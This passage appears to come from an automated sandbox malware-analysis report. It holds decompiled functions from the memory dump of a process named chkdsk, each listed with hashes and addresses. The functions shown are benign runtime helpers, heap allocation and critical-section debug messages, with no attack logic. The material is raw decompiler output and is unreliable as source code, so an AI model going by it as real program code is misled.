                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction ID: 9ef0ecdc2968934af75b6b3c44f5f124efb6f421ca538a2fe7b4b14075e08c69
                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction Fuzzy Hash: B5D0C236252981CFD7169B19C554B1573A4BB44B44FC50490E505CBB61E628E944CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E0A537 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04E0A537(intOrPtr _a4, intOrPtr _a8) {

				return L04DA8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                      0x04e0a553

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction ID: bb67fd853fb1d7b22234081d232609a959b197f92f49e91735faadec0d4bdbbf
                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction Fuzzy Hash: 99C01232180248BBCB126E81CC00F067B2AEBA4B60F008010BA080A5A08632EA70EA94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8DB40 Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D8DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04DA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                      0x04d8db4d
                                                      0x04d8db54
                                                      0x04d8db5f
                                                      0x04d8db56
                                                      0x04d8db56
                                                      0x04d8db5c
                                                      0x04d8db5c

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction ID: 2bf896e9aa6bed0378c52efdda4d3fc3aaf89824261f9540d01383763b6e469a
                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction Fuzzy Hash: 6BC08C30380A40AAEB222F20CD01B5036B1BB50B05F4800A06300DA0F0EBB8F811EA10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8AD30 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D8AD30(intOrPtr _a4) {

				return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                      0x04d8ad49

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction ID: c4471d52cc6fdee09bbf4a71a77cea6a07baf77da50c2dcdd8c51b43f033e987
                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: 28C08C32180248BBC7126B45CD00F117B29E790B60F000020B6040A6618932EC60D598
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB36CC Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DB36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                      0x04db36d2
                                                      0x04db36e8
                                                      0x04db36d4
                                                      0x04db36e5
                                                      0x04db36e5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction ID: 3ef11dd6e48cfbecf43291044d2f1b6b132988e999cd00756d753fcbc606475a
                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction Fuzzy Hash: EBC02B70250440FBE7151F30CD00F547254F700A21FAC03547221494F0E668BC00E600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D976E2 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D976E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                      0x04d976e4
                                                      0x00000000
                                                      0x04d976f8
                                                      0x04d976fd

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction ID: d412ca23420b888a64005879acb9a774b70c8239ca13e705b2e3d03924247448
                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction Fuzzy Hash: F9C08C703621809AEF2A6B08CE20B303690BB08708F48019CAA01894A1C368FC12C208
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DA3A1C Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DA3A1C(intOrPtr _a4) {
				void* _t5;

				return L04DA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                      0x04da3a35

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction ID: d5da611b732f3a932557a18234760f4079ce61c91e5f3f5a2c7aa0f8707f7488
                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction Fuzzy Hash: C0C08C32180248BBC7126F41DC00F017B29E790B60F080020B6040A5608672EC60D998
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DA7D50 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DA7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                      0x04da7d56
                                                      0x04da7d5b
                                                      0x04da7d60
                                                      0x04da7d5d
                                                      0x04da7d5d
                                                      0x04da7d5d

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: 1d0a00162bfe3a4548e00ce31230253c72f1e3640193bd68274ac26cda616306
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: 39B09234301940CFCF16DF18C080B1533E4BB44A40B8400D0E400CBA20D229E8008900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB2ACB Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DB2ACB() {
				void* _t5;

				return E04D9EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                      0x04db2adc

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 9b420140838486d7d1929678cc22fb0e525c03fafc9550b1ef7e2feb65db1436
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: 9EB01232D10450CFCF02EF40C610B197371FB00754F054490900167D70C329BC01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E1FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E04E1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04DCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04E15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04E15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x04e1fdda
                                                      0x04e1fde2
                                                      0x04e1fde5
                                                      0x04e1fdec
                                                      0x04e1fdfa
                                                      0x04e1fdff
                                                      0x04e1fe0a
                                                      0x04e1fe0f
                                                      0x04e1fe17
                                                      0x04e1fe1e
                                                      0x04e1fe19
                                                      0x04e1fe19
                                                      0x04e1fe19
                                                      0x04e1fe20
                                                      0x04e1fe21
                                                      0x04e1fe22
                                                      0x04e1fe25
                                                      0x04e1fe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E1FDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04E1FE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04E1FE01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 369cc988a33b9915c5aaf5a617db4d24226e7d88c19ab345ea838b5e39a4e854
                                                      • Instruction ID: 3ed215468c9a636cf79484edc55a49ba1ff77820f4de33cf8c9aa6e7f58a23dd
                                                      • Opcode Fuzzy Hash: 369cc988a33b9915c5aaf5a617db4d24226e7d88c19ab345ea838b5e39a4e854
                                                      • Instruction Fuzzy Hash: F1F0F632240241BFE6211A45DC02F23BF6BEB84730F140315F628561E1EAA2F86097F4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%